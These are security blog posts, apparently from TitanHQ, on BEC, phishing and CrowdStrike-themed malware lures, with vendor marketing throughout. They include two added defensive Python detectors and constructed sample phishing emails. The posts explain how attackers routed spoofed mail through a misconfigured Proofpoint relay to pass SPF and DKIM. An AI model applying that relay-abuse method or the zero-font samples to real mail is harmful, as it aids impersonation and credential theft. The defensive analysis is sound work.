Defending against BEC attacks can be a challenge, as legitimate email accounts are often used and the scammers are expert impersonators. The use of AI tools makes these scams even more difficult to identify. Defending against BEC attacks requires a defense-in-depth approach to prevent malicious emails from being delivered and prepare the workforce by improving awareness of the threats.

Security awareness training is vital. All members of the workforce should receive training and be made aware of BEC scams (and other cybersecurity threats). Training should cover the basics of these scams, such as why they are conducted and the attackers’ aims, as well as the red flags to look for. Phishing simulations can be highly beneficial, as BEC scams can be simulated to put training to the test and give individuals practice at identifying these scams. TitanHQ’s SafeTitan platform includes BEC training material and a phishing simulator and makes it easy for businesses to improve their human defenses against BEC attacks.

Policies and procedures should be developed and implemented to reduce risk. For instance, it should be company policy for any requested change to banking credentials to be reviewed by a supervisor, and for any requested bank account changes by vendors to require verification by phone, using previously verified contact information.

It is vital to implement technical security measures to prevent email accounts from being compromised, malware from being installed, and to identify and block BEC emails. Traditional anti-spam software often fails to detect these sophisticated threats. A standard anti-spam appliance will perform a range of checks on the sender’s reputation and may be able to detect and block spoofed emails, but generally not emails sent from legitimate compromised accounts. Traditional anti-spam and antivirus solutions can detect known malware, but not novel malware threats.

What is needed is a next-generation hosted anti-spam service with machine learning and AI capabilities that can learn about the standard emails sent and received by a company or individual, determine when emails deviate from the norm, and flag them as suspicious. AI-based protection is needed to defeat cybercriminals’ use of AI tools. The spam filtering service should also include email sandboxing in addition to standard anti-virus protection to identify and block novel malware threats, to prevent the malware infections that are used to gather information to support BEC attacks. SpamTitan from TitanHQ has all these features and more, with recent independent tests confirming the solution provides exceptional protection against phishing, spam, and sophisticated threats such as BEC attacks.

The most important thing to do is to take proactive steps to improve your defenses. Doing nothing could see your business featured in the next set of FBI statistics. Give the TitanHQ team a call today to discuss the best defenses for your business and find out more about how TitanHQ can help block BEC attacks and other cyber threats.

Massive Phishing Campaign Defeats SPF and DKIM by Leveraging Proofpoint Misconfiguration

A massive phishing campaign that involved around 3 million emails a day was made possible due to a misconfiguration in Proofpoint’s email servers. The vulnerability was exploited to get the emails signed with DomainKeys Identified Mail (DKIM) and approved by SPF, thereby ensuring the emails were delivered to inboxes.

Researchers at Guardio identified the campaign, which ran from January 2024 to June 2024 and at its peak involved sending around 14 million emails a day. The purpose of the campaign was to steal credit card numbers and set up regular credit card payments. The emails impersonated well-known brands such as Nike, Disney, Coca-Cola, and IBM. As is common in phishing attempts, the headers of the emails were spoofed to make it appear that the email had been sent by a genuine company. The majority of spam filters would be able to detect this spoofing and block the emails because they use Sender Policy Framework (SPF) and DKIM, specifically to detect and prevent spoofing.

Emails must be sent from approved servers to pass SPF checks, and they must be authenticated using the DKIM key for the domain. With DKIM, public-key cryptography is used to sign an email with a private key when it leaves the sender’s server, and the recipient server uses the public key to verify the source of the message. If the From field matches, the DKIM check is passed, the email is determined to be authentic, and it will be delivered. If not, the email will be identified as spam and will be blocked. In this campaign the emails were all properly signed and authenticated, ensuring that they would be delivered.

For an email that impersonated Nike, a spoofed email address would be used with the nike.com domain, which thanks to passing the SPF and DKIM checks, would be verified by the recipient as having been authenticated. The recipient may be fooled that the email has come from the genuine company domain, and since the emails themselves contained that company’s branding and provided a plausible reason for taking action, the user may click the link in the email.

As with most phishing emails, there is urgency. Action must be taken quickly to avoid negative consequences, such as an impending charge, notification about the closure of an account, or another pressing matter. If the link is clicked, the user will be directed to a phishing site that also spoofs the brand and they are asked to provide their credit card details. Alternatively, they are offered a too-good-to-be-true offer, and by paying they also enroll in an ongoing subscription involving sizeable monthly charges.

The way that the attackers got around the checks was to send the emails from an SMTP server on a virtual server under their control and to route them through a genuine Office 365 account on an Exchange Online server, then through a domain-specific Proofpoint server which sent the email on to the intended recipient. Since the Proofpoint customers being spoofed had authorized the Proofpoint service to send emails on their behalf as an allowed email sender, the attackers only had to find a way to send spoofed emails through the Proofpoint relay. Due to a misconfiguration that allowed Microsoft Office 365 accounts to easily interact with its relay servers, they were able to do just that, pass SPF and DKIM checks, and make their fake emails appear to be clean.

They obtained the MX record for the company being spoofed by querying the domain’s public DNS, then routed the email through the correct Proofpoint host that is used to process email for that domain. Since the Proofpoint server was tricked into believing that the emails had come from the genuine domains of its customers – such as Nike and Disney – the emails were then forwarded to the intended recipients rather than being quarantined.
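The following is an added example (not code from the article, Guardio or Proofpoint) showing why a passing SPF/DKIM result with an aligned From domain is not proof of legitimacy: it parses the Authentication-Results and Received headers of a constructed message that mirrors the relay chain described above and flags the upstream hops that do not belong to the sender's own infrastructure. All hostnames, addresses and the expected-origin list are constructed placeholders.

```python
"""Check what SPF/DKIM alignment does and does not prove for one message.

Added example, not code from the original article, Guardio or Proofpoint.
The sample message, hostnames and addresses are constructed placeholders
that mirror the relay chain the article describes (attacker VPS -> Office
365 tenant -> brand's outbound relay -> recipient).
"""
import email
import re
from email.utils import parseaddr

# Constructed sample: authentication passes and the From domain aligns, yet
# the Received chain shows the message entered the brand's relay from a
# tenant that is not part of the brand's own mail infrastructure.
SAMPLE_MESSAGE = """\
Received: from relay.brand-outbound.example (relay.brand-outbound.example [203.0.113.10])
\tby mx.recipient.example with ESMTPS; Tue, 4 Jun 2024 10:00:03 +0000
Received: from mail.tenant.outlook-placeholder.example ([198.51.100.7])
\tby relay.brand-outbound.example with ESMTP; Tue, 4 Jun 2024 10:00:02 +0000
Received: from vps.attacker-placeholder.example ([192.0.2.55])
\tby mail.tenant.outlook-placeholder.example with ESMTP; Tue, 4 Jun 2024 10:00:01 +0000
Authentication-Results: mx.recipient.example;
\tspf=pass smtp.mailfrom=brand.example;
\tdkim=pass header.d=brand.example header.s=sel1;
\tdmarc=pass header.from=brand.example
From: "Brand Offers" <offers@brand.example>
To: victim@recipient.example
Subject: Your exclusive offer expires today
Content-Type: text/plain

Act now: your card will be charged unless you confirm your details.
"""

# Hosts the brand is expected to originate mail from (an assumption for the
# example; in practice this comes from the sender's published infrastructure
# or the relay operator's per-customer configuration).
EXPECTED_ORIGIN_SUFFIXES = ("brand-outbound.example", "brand.example")

RECEIVED_FROM = re.compile(r"^from\s+(\S+)", re.IGNORECASE)


def parse_auth_results(msg):
    """Parse Authentication-Results into {method: {'result': ..., props}}."""
    raw = " ".join(msg.get("Authentication-Results", "").split())
    parts = [p.strip() for p in raw.split(";") if p.strip()]
    results = {"authserv_id": parts[0] if parts else ""}
    for part in parts[1:]:
        tokens = part.split()
        method, _, verdict = tokens[0].partition("=")
        props = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        results[method] = {"result": verdict, **props}
    return results


def from_domain(msg):
    """Domain of the RFC 5322 From address, which is what the user sees."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def is_aligned(domain, from_dom):
    """Relaxed alignment: same domain as, or a subdomain of, the From domain."""
    domain = domain.lower()
    return bool(domain) and (domain == from_dom or domain.endswith("." + from_dom))


def relay_path(msg):
    """'from' host of every Received header, oldest hop first."""
    hops = []
    for received in msg.get_all("Received", []):
        match = RECEIVED_FROM.match(" ".join(received.split()))
        hops.append(match.group(1).lower() if match else "?")
    return list(reversed(hops))


def assess(raw_message, expected_origin_suffixes=EXPECTED_ORIGIN_SUFFIXES):
    """Combine authentication verdicts with a sanity check on the relay path."""
    msg = email.message_from_string(raw_message)
    auth = parse_auth_results(msg)
    from_dom = from_domain(msg)
    spf = auth.get("spf", {})
    dkim = auth.get("dkim", {})
    spf_ok = spf.get("result") == "pass" and is_aligned(spf.get("smtp.mailfrom", ""), from_dom)
    dkim_ok = dkim.get("result") == "pass" and is_aligned(dkim.get("header.d", ""), from_dom)
    hops = relay_path(msg)
    # Every hop before the final outbound relay should belong to the sender's
    # own infrastructure; anything else means the relay accepted and signed
    # mail that originated elsewhere.
    unexpected = [h for h in hops[:-1] if not h.endswith(tuple(expected_origin_suffixes))]
    return {
        "from_domain": from_dom,
        "spf_aligned_pass": spf_ok,
        "dkim_aligned_pass": dkim_ok,
        "authenticated": spf_ok or dkim_ok,
        "relay_path": hops,
        "unexpected_upstream_hops": unexpected,
        "suspicious": bool(unexpected),
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_MESSAGE).items():
        print(f"{key}: {value}")
```

Run against the constructed message, the verdict is "authenticated" and fully aligned, yet the relay path shows two upstream hops outside the brand's infrastructure; this is the signal that authentication results alone do not carry.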

Spammers are constantly developing new methods of defeating the best email security solutions and while email security products can usually block spam and malicious emails, some will be delivered to recipients. This is why it is important to have layered defenses in place to protect against all phases of the attack. For instance, in this attack, spam filters were bypassed, but other measures could detect and block this attack. For instance, a web filter can be used to prevent a user from visiting a phishing website linked in an email, and security awareness training should be conducted to teach employees how to identify the signs of phishing, to check the domain of any website linked in an email, and to also check the domain when they arrive on any website.

Microsoft Forms Used in Phishing Campaign Targeting M365 Credentials

Microsoft credentials are being targeted in phishing campaigns that abuse Microsoft Forms. Microsoft Forms is a feature of Microsoft 365 that is commonly used for creating quizzes and surveys. Microsoft Forms has been used in the past for phishing campaigns, and Microsoft has implemented phishing protection measures to prevent abuse, but these campaigns show that those measures are not always effective.

To increase the probability of the phishing emails being delivered and the recipients responding, threat actors use compromised email accounts for the campaigns. If a business email account can be compromised in a phishing attack, it can be used to send phishing emails internally. Vendor email accounts are often targeted and used to conduct attacks on their customers. The emails are likely to be delivered as they come from a trusted account, which may even be whitelisted on email security solutions to ensure that their messages are delivered.

If the recipient clicks the link in the email they are directed to a Microsoft Form, which has an embedded link that the user is instructed to click. If the link is clicked, the user is directed to a phishing page where they are asked to enter their Microsoft 365 credentials. If the credentials are entered, they are captured by the attacker and are used to access their account.

The initial contact includes messages with a variety of lures, including fake delivery failure notifications, requests to change passwords, and notifications about shared documents. When the user lands on the form, they are told to click a link and fill in a questionnaire; that link then sends the user to a phishing page that appears to be a genuine login page for Microsoft 365 or another company, depending on which credentials are being targeted.

The attackers make their campaign more realistic by using company logos in the phishing emails and familiar favicons in the browser tab on the fake web pages. Since Microsoft Forms is used in this campaign, the URL provided in the phishing emails has the format https://forms.office[dot]com, as the forms are on a genuine Microsoft Forms domain. Not only does that help to trick the user into thinking the request is genuine, but it also makes it much harder for email security solutions to determine that the email is not legitimate, as forms.office[dot]com is generally trusted and has a high reputation score.

When these phishing campaigns are detected, Microsoft takes prompt action to block these scams. Each form has a ‘report abuse’ button, so if the scams are identified by users, Microsoft will be notified and can take action to shut them down. The problem is that these emails are being sent in huge numbers and there is a considerable window of opportunity for the attacks. Further, if the attacker’s campaign is detected, they can just set up different web pages and forms and continue.

These phishing campaigns involve two phases. The first phase involves compromising email accounts to send the initial phishing emails. An advanced email security solution with sandboxing, URL rewriting, and AI-based detection capabilities will help to block this first phase of the attack. Advanced anti-phishing solutions for Office 365 can reduce the number of phishing emails that land in inboxes, even when sent from trusted email accounts. Banner warnings in emails will help to alert users to potential phishing emails; however, users need to be vigilant as it may be up to them to spot and report the phishing attempt. That means security awareness training should be provided to raise awareness of these types of phishing attempts.

Security awareness training should also incorporate phishing simulations, and it is recommended to create simulations of phishing attempts using Microsoft Forms. If users fall for the fake Microsoft Forms phishing attempts, they can be provided with further training and told how they could have identified the scam. If another Microsoft Forms phishing attempt is received, they are more likely to be able to identify it for what it is.

TitanHQ can help businesses improve their defenses against phishing through the TitanHQ cybersecurity suite, which includes the SpamTitan cloud-based anti-spam service, the PhishTitan anti-phishing solution, and the SafeTitan security awareness and phishing simulation platform. SpamTitan and PhishTitan have exceptionally high detection rates with a low false positive rate, and SafeTitan is the only behavior-driven security awareness training platform that delivers training in real-time in response to employee mistakes. Give the TitanHQ team a call today for more information about these products. You can book a product demonstration to find out more, and all solutions are available on a free trial.

How Real-Time Security Awareness Training Improves Cybersecurity

Cybersecurity awareness training is now vital for businesses to raise employees’ awareness of cyber threats. Here we will explain why you need real-time security awareness training and phishing simulations and the difference they can make to your security posture.

The biggest cybersecurity threat faced by businesses is phishing. Phishing attacks target employees, as cybercriminals and nation-state actors know all too well that employees are a weak link in security defenses. If they can get a phishing email in front of an employee and give them a plausible reason for taking the action they suggest, they can steal credentials that will give them the access they need, or get the employee to download and open a malicious file that will download malware and provide persistent access to the network.

It doesn’t always need to be a sophisticated phishing attempt if the email lands in the inbox of a busy employee or one who lacks security awareness. Many unsophisticated phishing attempts succeed due to human error. The problem is that phishing attempts are often sophisticated, and are now being crafted using LLMs, which not only ensure that the emails are devoid of spelling mistakes and grammatical errors but can also help to devise new phishing lures.

All it takes is for one phishing attempt to be successful to give an attacker the access they need for an extensive compromise. Cybercriminals often gain access to an employee’s email account and then use that account to conduct further phishing attempts internally, until they compromise large numbers of email accounts and manage to steal credentials with high privileges. Since email accounts often contain a wealth of sensitive and valuable data, the attack does not even need to progress further for it to be costly to remediate.

Businesses need to ensure that they have robust email security defenses, including an email security solution with sandboxing, AI, and machine learning detection to identify and block malware threats and zero-day phishing attacks, malicious URL detection capabilities, and a solution that is constantly updated with the latest threat intelligence. While the most advanced cloud-based email security solutions will block the vast majority of malicious emails, they will not block all threats. For example, in recent independent tests, SpamTitan email security was determined to have a spam catch rate of 99.984%, a phishing catch rate of 99.99%, and a malware catch rate of 100% with zero false positives, finishing second in the test.

For the small percentage of malicious emails that do reach inboxes, employees need to be prepared, be on their guard, and have the skills to identify and report suspicious emails, which is where security awareness training and phishing simulations are needed.

The purpose of security awareness training is to raise the level of awareness of cyber threats within the workforce, teach cybersecurity best practices, and eliminate risky behaviors. Training will only be effective if it is provided regularly, building up knowledge over time. Training should ideally be provided in short regular training sessions, with training programs running continuously throughout the year. Each week, every employee can complete a short training module which will help to build awareness and keep security fresh in the mind, with the ultimate goal of creating a security culture where every employee is constantly on their guard and aware that the next email they receive could well be a phishing attempt or contain malware.

Training is most effective when combined with phishing simulations. You can teach employees how to recognize a phishing email, but simulations give them practice at detecting threats and applying their training. Further, the emails will be received when the employees are completing work duties, just the same as a genuine phishing threat. A phishing simulator can be used to automate these campaigns, and administrators can track who responds to determine the types of threats that are tricking employees and the individuals who are failing to identify threats. Training programs can then be tweaked accordingly to address the weaknesses.

The most effective phishing simulation programs automatically deliver training content in real-time in response to security mistakes. When a phishing simulation is failed, the employee is immediately notified and given a short training module relevant to the mistake they made. When training is delivered in real time it serves two important purposes. It ensures that the employee is immediately notified about where they went wrong and how they could have identified the threat, and the training is delivered at the point when it is likely to have the greatest impact.

SafeTitan from TitanHQ makes providing training and conducting phishing simulations simple. The training modules are enjoyable, can be easily fitted into busy workflows, and the training material can be tailored to the organization and individual employees and roles. The training and simulations can be automated and require little management, and since the content is constantly updated with new material and phishing templates based on the latest tactics used by cybercriminals, employees can be kept constantly up to date.

For more information about SafeTitan security awareness training and phishing simulations, give the TitanHQ team a call.

Don’t Put Up with Substandard Phishing Protection for M365!

Businesses that rely on Microsoft Defender for detecting malware and phishing emails may not be as well protected as they think. While Defender performs a reasonable job at blocking malware, spam, and phishing emails, it lacks the high detection levels of many third-party anti-phishing solutions.

Take malware for example. A study conducted in 2022 by AV-Comparatives found Defender only had a 60.3% offline detection rate. Fast forward to Q2, 2024, and TitanHQ’s email security suite was put to the test alongside 12 other email security solutions by Virus Bulletin. In the independent tests, TitanHQ had a malware catch rate of 100%.

In the same round of testing, TitanHQ’s spam filter for Office 365 and the email security suite had a spam catch rate of over 99.98%, a phishing email catch rate of 99.99%, and was given an overall final score of 99.984, the second highest in the tests. It is possible to configure an email solution to provide maximum protection; however, that will be at the expense of an elevated number of false positives – genuine emails that are inadvertently marked as potentially suspicious and are quarantined until they are released by an administrator. In the tests, TitanHQ had a 0.00% false positive rate, with no genuine emails misclassified.

Another issue with Microsoft Defender is the exception list, which contains locations such as files, folders, and processes that are never scanned. These are used to ensure that legitimate apps are not scanned, to prevent them from being misclassified as malware. The problem is that the exception list lacks security protections, which means it can be accessed internally by all users. Should a device be compromised, a threat actor could access the exceptions list, identify folders and files that are not scanned, and use those locations to hide malware.

Given the increasingly dangerous threat environment and the high costs of a cyberattack and data breach, businesses need to ensure they are well-defended, which is why many businesses are choosing to protect their Microsoft 365 environments with TitanHQ’s PhishTitan anti-phishing solution.

PhishTitan is a cloud-based, AI-driven solution for Microsoft 365 that integrates seamlessly into M365 to increase protection from sophisticated phishing attacks. Rather than replacing Microsoft’s EOP and Defender protections, PhishTitan augments them and adds next-generation phishing protection, not only ensuring that more threats are blocked but also giving users easy-to-use remediation capabilities.

PhishTitan adds advanced threat detection capabilities through machine learning and LLM to identify the zero-day and emerging threats that are missed by Defender. PhishTitan provides real-time protection against phishing links in emails in addition to checks performed when the email is received. URLs are rewritten for Link Lock protection with all links reassessed at the point a user clicks to ensure that URLs that have been made malicious after delivery are detected and blocked. If the link is detected as malicious, access to that URL will be prevented.

PhishTitan also adds banner notifications to emails to alert users to unsafe content and emails from external sources, and the auto-remediation feature allows all threats to be instantly removed from the entire mail system, with robust cross-tenant features for detection and response for MSPs.

PhishTitan has also been developed to be quick to set up and configure. There is no need to change MX records, setup typically takes less than 10 minutes, and the solution is incredibly easy to manage. Why put up with inferior threat detection and complex interfaces when you can improve Office 365 phishing protection with an easy-to-use anti-phishing solution?

Don’t take our word for it though. Take advantage of the free trial of PhishTitan to see for yourself. Product demonstrations can also be arranged on request.

ZeroFont Phishing Scam Targets Microsoft 365 Users

A ZeroFont phishing campaign is being conducted that targets Microsoft 365 users. Rather than using the ZeroFont technique to hide malicious content from anti-spam software, this method aims to trick end users into thinking the email is genuine and safe.

The ZeroFont phishing technique was first identified in phishing attempts around five years ago, so it is not a new technique; however, this version uses a novel approach. When an email is sent to a business user, before that email is delivered it will be subject to various checks by the anti-spam server. The business’s anti-spam solution will perform reputation checks, scan the email for malware, and analyze the content of the email to search for signs of spam or phishing. Only if those checks are passed will the message be delivered to the end user. ZeroFont is a technique for hiding certain words from email security solutions to ensure that the messages are not flagged as spam and are delivered.

According to Check Point, Microsoft is the most commonly impersonated brand in phishing emails. If a threat actor impersonates Microsoft, they obviously cannot send the email from the Microsoft domain as they do not have access. Spam filters will check to make sure that the domain from which the email is sent matches the signature, and if there is no match, that is a strong signal that the email is not genuine. With ZeroFont, the signature used would only display Microsoft to the end user, and the spam filter is presented with a nonsensical string of text. The user would not see that text as the padding text around the word Microsoft is set to a font size of zero, which means the text is machine-readable but cannot be seen by the user.

A recent campaign uses the ZeroFont technique but with a twist. In this campaign, the aim is not to trick a spam filter but to trick Outlook users. In Outlook, it is possible to configure the mail client with a listing view option, which shows the user the first lines of text of an email. The problem for phishers is getting Outlook users to engage with the messages, which means the messages must be sufficiently compelling so as not to be deleted without being opened. This is especially important if the sender of the email is not known to the recipient.

The email was detected by Jan Kopriva, who noticed that ZeroFont was used to make the message appear trustworthy by displaying text indicating the message had been scanned and secured by the email security solution, rather than showing the first lines of visible content of the message. This was achieved by using a zero font size for some of the text. The threat actor knew that the first lines of the emails are displayed by the mail client in the listing view, regardless of the font size, which means if the font is set to zero, the text will be displayed in the listing view but will not be visible to the user in the message body when the email is opened.
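The two ZeroFont patterns described above (zero-size padding inside a brand name, and a zero-size lead-in placed where a preview pane will surface it) can both be caught on the receiving side by separating rendered text from text the reader never sees. The following scanner is an added example and is not code from TitanHQ or from the campaign write-up; the HTML bodies and the "ExampleMailGuard" name are constructed for illustration.

```python
"""Detect ZeroFont-style hidden text in an HTML email body.

Added example, not TitanHQ's or any other vendor's code. It walks the HTML,
records text inside elements whose inline style sets font-size to zero
(machine-readable but invisible to the reader) and reports where that hidden
text sits relative to the visible text. Sample bodies below are constructed.
"""
import re
from html.parser import HTMLParser

# font-size:0 / font-size: 0px / font-size:0.0em inside an inline style
FONT_SIZE_RE = re.compile(r"font-size\s*:\s*([0-9.]+)\s*[a-z%]*", re.I)
# Elements that never contain text and may appear without a closing tag
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "col"}


def is_zero_font(style):
    """True if an inline style sets font-size to 0 (in any unit)."""
    m = FONT_SIZE_RE.search(style or "")
    if not m:
        return False
    try:
        return float(m.group(1)) == 0.0
    except ValueError:
        return False


class ZeroFontScanner(HTMLParser):
    """Collect text runs in document order, each tagged visible or hidden."""

    def __init__(self):
        super().__init__()
        self._stack = []   # one bool per open element: does it hide text?
        self._hidden = 0   # number of zero-font ancestors currently open
        self.runs = []     # (is_hidden, text) in document order

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        hides = is_zero_font(dict(attrs).get("style"))
        self._stack.append(hides)
        if hides:
            self._hidden += 1

    def handle_startendtag(self, tag, attrs):
        pass  # <br/> and friends carry no text; keep the stack balanced

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self._stack:
            return
        if self._stack.pop():
            self._hidden -= 1

    def handle_data(self, data):
        text = data.strip()
        if text:
            self.runs.append((self._hidden > 0, text))


def scan_zerofont(html):
    """Return visible text, hidden (zero-font) text and a verdict.

    preview_spoof is set when the very first text run is hidden: that is the
    listing-view trick, where the client shows the zero-font lead-in in the
    preview while the opened message shows none of it.
    """
    scanner = ZeroFontScanner()
    scanner.feed(html)
    scanner.close()
    visible = [t for hidden, t in scanner.runs if not hidden]
    hidden = [t for hidden, t in scanner.runs if hidden]
    preview_spoof = bool(scanner.runs) and scanner.runs[0][0]
    return {
        "visible": visible,
        "hidden": hidden,
        "suspicious": bool(hidden),
        "preview_spoof": preview_spoof,
    }


# Constructed samples (not real campaign messages)
SAMPLE_LEGIT = "<html><body><p>Hi team, the Q3 report is attached.</p></body></html>"

# Zero-font lead-in meant to surface in a preview pane as a fake scan notice
SAMPLE_PREVIEW_SPOOF = (
    "<html><body>"
    '<span style="font-size:0px">Scanned and secured by ExampleMailGuard</span>'
    "<p>We have a job offer for you.<br>Reply with your full name and address.</p>"
    "</body></html>"
)

# Zero-font padding inside a brand name so a filter reads a nonsense string
SAMPLE_BRAND_PADDING = (
    '<html><body><p>From: M<span style="font-size:0">xq7z</span>icrosoft '
    "Account Team</p></body></html>"
)

if __name__ == "__main__":
    for name, body in [("legit", SAMPLE_LEGIT),
                       ("preview_spoof", SAMPLE_PREVIEW_SPOOF),
                       ("brand_padding", SAMPLE_BRAND_PADDING)]:
        print(name, scan_zerofont(body))
```

A gateway rule built on this would treat any non-empty `hidden` list as a strong spam signal and, for user-facing clients, could strip zero-font runs before generating the preview text.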

The email used a fake job offer as a lure and asked the user to reply with their personal information: Full name, address, phone number, and personal email, and impersonated the SANS Technology Institute. The full purpose of the phishing attempt is not known. There were no malicious links in the email and no malware attached so the email would likely pass through spam filters. If a response is received, the personal information could be used for a spear phishing attempt on the user’s personal email account, which is less likely to have robust spam filtering in place, or for a voice phishing attempt, as we have seen in many callback phishing campaigns.

Security awareness training programs train employees to look for signs of phishing and other malicious communications, and they are often heavily focused on embedded links in emails and attachments. Emails such as this and callback phishing attempts lack the standard malicious content and as such, end users may not identify them as phishing attempts. It is important to incorporate phishing emails such as this in security awareness training programs to raise awareness of the threat.

That is easy with SafeTitan from TitanHQ, as is conducting phishing simulations with these atypical message formats. SafeTitan includes a huge library of security awareness training content, and the phishing simulator includes thousands of phishing templates from real-world phishing attempts. It is easy for businesses to create and automate comprehensive security awareness training programs for the workforce and provide training on how to identify novel techniques such as this when they are identified, to ensure employees are kept up to date on the latest tactics, techniques, and procedures used by cybercriminals.

CrowdStrike Phishing and Malware Distribution Scams Mount Following Outage

CrowdStrike has confirmed that a significant proportion of Windows devices that were rendered inoperable following a faulty update last Friday have now been restored to full functionality; however, businesses are still facing disruption and many scams have been identified by cybercriminals looking to take advantage.

One of those scams involves a fake recovery manual that is being pushed in phishing emails. The emails claim to provide a Recovery Tool that fixes the out-of-bounds memory read triggered by the update that caused Windows devices to crash and display the blue screen of death. The phishing emails include a document attachment named “New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm.” The document is a copy of a Microsoft support bulletin, which claims that a new Microsoft Recovery Tool has been developed that automates recovery by deleting the CrowdStrike driver that is causing the crash. The user is prompted to enable content; however, doing so allows a macro to run, which downloads a malicious DLL that launches the Daolpu stealer – an information stealer that collects and exfiltrates credentials, login information, and cookies stored in Chrome and Firefox.

Another campaign has been identified that capitalizes on the defective Falcon Sensor update. The spear phishing campaign targeted German firms and attempts to distribute a fake CrowdStrike Crash Reporter installer via a website that spoofs a legitimate German company. The website was registered a day after the CrowdStrike disruptions started. If the user attempts to download the installer by clicking the download button in the email, a ZIP archive will be delivered that includes a malicious InnoSetup installer. If executed, the user is shown a fake CrowdStrike branded installer. The installer is password-protected to prevent analysis and the final payload could not be determined.

Another campaign attempts to distribute Lumma information-stealing malware. The campaign uses the domain, crowdstrike-office365[.]com, and tricks the recipient into downloading a fake recovery tool to deal with the boot loop that prevents Windows devices from booting up. If the downloaded file is executed, it delivers a malware loader, which will, in turn, deliver the Lumma infostealer.

These are just three campaigns that use the CrowdStrike outage to deliver malware, all of which use email as the way to make contact with individuals affected by the outage. Many other campaigns are being conducted and a large number of CrowdStrike-themed domains have been registered since the problems started. Other malicious domains used in campaigns include the following, all of which should be blocked.


These scams are likely to continue for some time, so it is important to remind employees of the high risk of malicious emails and warn them to exercise extreme caution with any emails received. Employees should be told to report any suspicious emails to their security team.

TitanHQ offers a range of cybersecurity solutions to block phishing and malware distribution campaigns, all of which are quick and easy to implement and can protect you in a matter of minutes. They include the WebTitan web filter for blocking access to known malicious websites, such as those detailed in this email; the PhishTitan anti-phishing solution for Office 365, and the SpamTitan corporate email filter for blocking phishing emails. The latter incorporates email sandboxing for blocking novel and obfuscated malware threats. TitanHQ also provides a comprehensive security awareness training platform and phishing simulator for improving your human defenses by raising awareness of cyber threats and providing timely training content on the latest tactics used by cybercriminals in targeted attacks on employees.

Give the TitanHQ team a call today for further information on improving your defenses, or take advantage of the free trial available with all TitanHQ products to get immediate protection.

Surge in Fake Websites and Phishing Related to CrowdStrike Windows Outage

On July 19, 2024, Windows workstations and servers were disabled as a result of a bug in a software update for CrowdStrike Falcon Sensor. When the update was installed on Windows devices, it caused them to show the Blue Screen of Death or get stuck in a boot loop, rendering the devices unusable. Microsoft revealed that its telemetry showed 8.5 million Windows devices had been affected in around 78 minutes.

CrowdStrike Falcon platform is a cybersecurity solution that incorporates anti-virus protection, endpoint detection and response, threat intelligence, threat hunting, and security hygiene, and it is used by many large businesses around the world, including around half of Fortune 500 firms. The disruption caused by the update has been colossal. Airlines had to ground flights, airports were unable to check people in, healthcare providers were unable to access electronic patient records and had to cancel appointments and surgeries, financial institutions faced major disruption, and some media companies were unable to broadcast live television for hours. Even organizations that did not use the Falcon product were adversely affected if any of their vendors used the product. The incident has been called the worst-ever IT outage, with huge financial implications.

It did not take long for cybercriminals to take advantage of the chaos. Within hours, cybercriminals were registering fake websites impersonating CrowdStrike offering help fixing the problem, and domains were registered and used in phishing campaigns promising a rapid resolution of the problem. Given the huge financial impact of suddenly not having access to any Windows devices, there was a pressing need to get a rapid resolution but the fixes being touted by cybercriminals involved downloading fake updates and hotfixes that installed malware.

Those fake updates are being used to deliver a range of different malware types including malware loaders, remote access Trojans, data wipers, and information stealers, while the phishing campaigns direct users to websites where they are prompted to enter their credentials, which are captured and used to access accounts. Cybercriminals have been posing as tech specialists and independent researchers and have been using deepfake videos and voice calls to get users to unwittingly grant them access to their devices, disclose their passwords, or divulge other sensitive codes.

CrowdStrike has issued a fix and provided instructions for resolving the issue, but those instructions require each affected device to be manually fixed. The fix was rolled out rapidly, but CrowdStrike CEO George Kurtz said it will likely take some time for a full recovery for all affected users, creating a sizeable window of opportunity for threat actors. Due to the surge in criminal activity related to the outage, everyone should remain vigilant and verify the authenticity of any communications, including emails, text messages, and telephone calls, and only rely on trusted sources for guidance. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reminded all organizations of the importance of having robust cybersecurity measures in place to protect their users, assets, and data, and of the need to remind all employees to avoid opening suspicious emails or clicking on unverified links in emails.

It is important to have multiple layers of security protection to identify, detect, and avoid these attacks, including AI-driven phishing protection, web filtering to block access to malicious websites, anti-virus software to detect and neutralize malware, and security awareness training for employees. TitanHQ can help to secure your business in all of these areas and offers a cloud-based spam filtering service (SpamTitan) which includes email sandboxing and email antivirus filter, phishing protection for Office 365 (PhishTitan), and the SafeTitan security awareness training and phishing simulator.

Is Your Business Prepared for a Summer of Scams?

Phishing attacks and business email compromise scams are leading causes of losses to cybercrime and attacks have increased in 2024. According to the Federal Bureau of Investigation, phishing is the leading cause of complaints to its Internet Crime Complaint Center and business email compromise currently ranks second out of all tracked forms of cybercrime in terms of total losses.

Over the coming days and weeks, there are several events that cybercriminals take advantage of in their attacks and scams. The UEFA European Football Championship is currently taking place in Germany and thousands of individual phishing campaigns have been detected so far that are piggybacking on the popularity of the championship in Europe and beyond.

Cybercriminals often take advantage of sporting events and commonly use lures related to tickets, which usually sell out months before the first football is kicked and this year is no exception. Now that the tournament is underway and broadcasters and other legitimate entities are running competitions offering free tickets to the finals, scammers are doing the same and are using email and social media networks to advertise their scams. These campaigns use realistic websites that are almost identical to the brands they spoof and attempt to steal sensitive information such as credit card numbers and login credentials.

Many of the phishing attacks and scams impersonate businesses associated with the tournament. These include accommodation providers, airlines and travel companies, and others. The Wimbledon tennis tournament is underway, which will be shortly followed by another major sporting event in Paris – The 2024 Olympics. The latter has a huge global audience and there is a high risk of cyber threat activity using Olympics-themed lures. Cybercriminals are impersonating event organizations, sponsors, ticketing systems, and travel companies. Many cyber espionage groups and nation-state actors are likely to target the Olympics, in addition to financially motivated threat actors.

This week, there is a major celebration in the United States on July 4. Independence Day is a very active time for a host of malicious actors who conduct scams related to the celebrations, including holiday-themed texts and emails, fake giveaways and vouchers, and Independence Day event ticket scams. Being a major holiday in the United States when staffing levels are greatly reduced, it is a time when many ransomware groups choose to strike as their activities are less likely to be identified.

